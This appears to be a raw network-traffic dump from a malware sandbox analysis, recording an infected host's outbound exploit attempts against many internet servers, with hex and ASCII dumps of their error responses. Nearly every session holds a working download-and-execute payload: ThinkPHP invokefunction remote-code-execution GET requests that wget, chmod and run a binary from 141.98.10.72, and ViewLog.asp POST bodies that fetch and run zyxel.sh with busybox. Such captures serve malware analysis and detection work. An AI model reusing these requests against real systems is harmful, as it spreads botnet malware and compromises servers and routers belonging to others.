                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        763192.168.2.145880295.209.157.10580
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:42.372874022 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:43.155796051 CET466INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:34:17 GMT
                                                        Server: Apache
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        764192.168.2.1433226112.107.147.7080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:43.445425987 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:43.732511997 CET628INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:34:43 GMT
                                                        Server: Apache
                                                        Last-Modified: Thu, 23 Nov 2023 09:46:30 GMT
                                                        ETag: "15e-60aceb5d36788"
                                                        Accept-Ranges: bytes
                                                        Content-Length: 350
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 31 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 71 75 61 72 65 2d 65 66 73 73 2e 63 6f 6d 2f 63 63 2f 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 22 68 74 74 70 73 3a 2f 2f 22 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 20 2b 20 22 2f 63 63 2f 23 22 3b 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 43 6c 6f 75 64 20 45 46 53 53 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML><html lang="en-US"> <head> <meta charset="UTF-8"> <meta http-equiv="refresh" content="1;url=https://square-efss.com/cc/"> <script type="text/javascript"> window.location.href = "https://" + window.location.host + "/cc/#"; </script> <title>Cloud EFSS</title> </head></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        765192.168.2.1456142112.84.131.10680
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:43.506515980 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        766192.168.2.1456350112.215.183.7680
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:43.515386105 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:43.870964050 CET1286INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:34:43 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Server: gvs 1.0
                                                        Connection: Close
                                                        Content-Length: 1555
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 30 20 28 42 61 64 20 52 65 71 75 65 73 74 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31
                                                        Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 400 (Bad Request)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_1
                                                        Feb 14, 2024 09:34:43.871000051 CET506INData Raw: 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61
                                                        Data Ascii: 50x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-bloc


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        767192.168.2.1456354112.215.183.7680
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:43.516642094 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:43.873449087 CET1286INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:34:43 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Server: gvs 1.0
                                                        Connection: Close
                                                        Content-Length: 1555
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 30 20 28 42 61 64 20 52 65 71 75 65 73 74 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31
                                                        Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 400 (Bad Request)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_1
                                                        Feb 14, 2024 09:34:43.873483896 CET506INData Raw: 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61
                                                        Data Ascii: 50x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-bloc


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        768192.168.2.1436508112.65.217.5480
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:43.531143904 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:43.866733074 CET386INHTTP/1.1 400 Bad Request
                                                        Server: Tengine
                                                        Date: Wed, 14 Feb 2024 08:34:43 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 227
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 74 65 6e 67 69 6e 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr/>Powered by Tengine<hr><center>tengine</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        769192.168.2.143997031.200.103.1608080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:44.197323084 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        770192.168.2.143296695.86.115.1948080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:44.204277992 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        771192.168.2.143333631.136.206.788080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:44.399342060 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:45.028961897 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:46.276906967 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:48.932779074 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
